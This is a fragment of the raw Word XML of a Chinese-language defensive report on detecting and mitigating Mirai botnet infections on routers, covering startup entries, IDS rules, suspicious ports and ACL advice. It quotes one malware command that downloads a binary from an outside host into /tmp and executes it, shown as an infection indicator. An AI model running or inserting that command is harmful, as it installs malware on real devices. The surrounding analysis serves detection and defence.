          <w:r w:rsidRPr="009235AA">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidRPr="009235AA">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[12]</w:t>
          </w:r>
          <w:r w:rsidRPr="009235AA">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="009235AA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="007E2F86" w:rsidRPr="007E2F86" w:rsidRDefault="007E2F86" w:rsidP="007E2F86">
      <w:pPr>
        <w:pStyle w:val="a3"/>
        <w:spacing w:before="0" w:beforeAutospacing="0" w:after="0" w:afterAutospacing="0"/>
        <w:ind w:left="60" w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="gramStart"/>
      <w:r w:rsidRPr="007E2F86">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t>cd</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r w:rsidRPr="007E2F86">
        <w:rPr>
          <w:rFonts w:ascii="Consolas" w:hAnsi="Consolas"/>
          <w:color w:val="C7254E"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:shd w:val="clear" w:color="auto" w:fill="F9F2F4"/>
        </w:rPr>
        <w:t xml:space="preserve"> /tmp;wget http://l.ocalhost.host/2;chmod 777 2;./2</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009235AA" w:rsidRDefault="009235AA" w:rsidP="009235AA">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF5378">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>因此</w:t>
      </w:r>
      <w:r w:rsidR="007E2F86">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，检查服务器启动项也可作为</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5378">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>一种鉴别手段方法。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004C0B7D" w:rsidRPr="00CF5378" w:rsidRDefault="004C0B7D" w:rsidP="009235AA">
      <w:pPr>
        <w:pStyle w:val="aa"/>
        <w:ind w:left="420" w:firstLineChars="0" w:firstLine="0"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Fox-it给出了一个能用于检测感染的Snort</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> IDS规则</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-1102186593"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEnd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len16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Pr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t xml:space="preserve"> </w:t>
          </w:r>
          <w:r w:rsidRPr="004C0B7D">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:noProof/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:t>[11]</w:t>
          </w:r>
          <w:r>
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00757648" w:rsidRPr="00CF5378" w:rsidRDefault="00CF5378" w:rsidP="00CF5378">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF5378">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>可以通过流量分析的方式判断设备的异常</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5378">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。为</w:t>
      </w:r>
      <w:r w:rsidR="00D56D66" w:rsidRPr="00CF5378">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>鉴别一台设备是否被早期Mirai(23/2323)感染</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5378">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5378">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>可</w:t>
      </w:r>
      <w:r w:rsidR="00D56D66" w:rsidRPr="00CF5378">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>对TCP/23和TCP/2323的流量进行统计和</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5378">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>分类</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-1867213095"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00D56D66" w:rsidRPr="00CF5378">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00D56D66" w:rsidRPr="00CF5378">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Rol16 \l 2052 </w:instrText>
          </w:r>
          <w:r w:rsidR="00D56D66" w:rsidRPr="00CF5378">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>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w:t>
          </w:r>
          <w:r w:rsidR="00D56D66" w:rsidRPr="00CF5378">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="00CF5378">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
      <w:r w:rsidR="00D56D66" w:rsidRPr="00CF5378">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>鉴别一台设备是否被变种Mirai(7547/5555)感染的方法包括</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5378">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00757648" w:rsidRPr="000F6CCA">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>查看当前路由器是否开放了31517端口，是否关闭了7547端口</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-696841360"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidR="00757648" w:rsidRPr="000F6CCA">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidR="00757648" w:rsidRPr="000F6CCA">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00757648" w:rsidRPr="000F6CCA">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText>CITATION 绿盟科16 \l 2052</w:instrText>
          </w:r>
          <w:r w:rsidR="00757648" w:rsidRPr="000F6CCA">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> </w:instrText>
          </w:r>
          <w:r w:rsidR="00757648" w:rsidRPr="000F6CCA">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[9]</w:t>
          </w:r>
          <w:r w:rsidR="00757648" w:rsidRPr="000F6CCA">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="00CF5378">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。31517端口的流量应该是</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SYN</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5378">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>包，也有可能是HTTP，这一点需要进一步核实。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00757648" w:rsidRPr="00CF5378" w:rsidRDefault="00CF5378" w:rsidP="00CF5378">
      <w:pPr>
        <w:ind w:firstLine="420"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CF5378">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>由于</w:t>
      </w:r>
      <w:r w:rsidRPr="00CF5378">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Mirai僵尸会对其他主机进行扫描，我们认为可以通过ISP的流量日志发现扫描行为，从而对Mirai僵尸进行定位。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="009A1AB3" w:rsidRDefault="00CE6432" w:rsidP="00CF5378">
      <w:pPr>
        <w:pStyle w:val="2"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="10"/>
        </w:numPr>
      </w:pPr>
      <w:bookmarkStart w:id="10" w:name="_Toc469905252"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>如何进行防护</w:t>
      </w:r>
      <w:bookmarkEnd w:id="10"/>
    </w:p>
    <w:p w:rsidR="009A1AB3" w:rsidRPr="008E4800" w:rsidRDefault="00CE6432" w:rsidP="009A1AB3">
      <w:pPr>
        <w:ind w:firstLine="540"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Abor给出的方案是</w:t>
      </w:r>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="00046FD7" w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>设备应</w:t>
      </w:r>
      <w:r w:rsidR="009A1AB3" w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>实现</w:t>
      </w:r>
      <w:r w:rsidR="009A1AB3" w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ACL，阻止</w:t>
      </w:r>
      <w:r w:rsidR="009A1AB3" w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>high-port TCP 流量对TCP/23 和 TCP/2323的访问</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-532797583"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidRPr="008E4800">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="008E4800">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION Rol16 \l 2052 </w:instrText>
          </w:r>
          <w:r w:rsidRPr="008E4800">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>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w:t>
          </w:r>
          <w:r w:rsidRPr="008E4800">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidR="003D31B3" w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidR="003D31B3" w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>从而有效防止原生Mirai的入侵</w:t>
      </w:r>
      <w:r w:rsidR="00757648" w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="008E4800" w:rsidRDefault="008E4800" w:rsidP="009A1AB3">
      <w:pPr>
        <w:ind w:firstLine="540"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00757648" w:rsidRPr="008E4800" w:rsidRDefault="00757648" w:rsidP="009A1AB3">
      <w:pPr>
        <w:ind w:firstLine="540"/>
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Fox</w:t>
      </w:r>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>it给出的防护</w:t>
      </w:r>
      <w:r w:rsidR="008E4800" w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>建议包括</w:t>
      </w:r>
      <w:sdt>
        <w:sdtPr>
          <w:rPr>
            <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
            <w:kern w:val="0"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
          </w:rPr>
          <w:id w:val="-1473044083"/>
          <w:citation/>
        </w:sdtPr>
        <w:sdtEndPr/>
        <w:sdtContent>
          <w:r w:rsidRPr="008E4800">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="begin"/>
          </w:r>
          <w:r w:rsidRPr="008E4800">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:instrText xml:space="preserve"> CITATION len16 \l 2052 </w:instrText>
          </w:r>
          <w:r w:rsidRPr="008E4800">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>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[13]</w:t>
          </w:r>
          <w:r w:rsidRPr="008E4800">
            <w:rPr>
              <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
              <w:kern w:val="0"/>
              <w:sz w:val="24"/>
              <w:szCs w:val="24"/>
            </w:rPr>
            <w:fldChar w:fldCharType="end"/>
          </w:r>
        </w:sdtContent>
      </w:sdt>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>：</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I</w:t>
      </w:r>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>SP应该配置其设备</w:t>
      </w:r>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>只允许本</w:t>
      </w:r>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体" w:hint="eastAsia"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ISP管理网络访问，而不对公网开放；</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用户应替换掉</w:t>
      </w:r>
      <w:r w:rsidRPr="008E4800">
        <w:rPr>
          <w:rFonts w:ascii="宋体" w:eastAsia="宋体" w:hAnsi="宋体" w:cs="宋体"/>
          <w:kern w:val="0"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>Eir D1000等不安全设备</w:t>
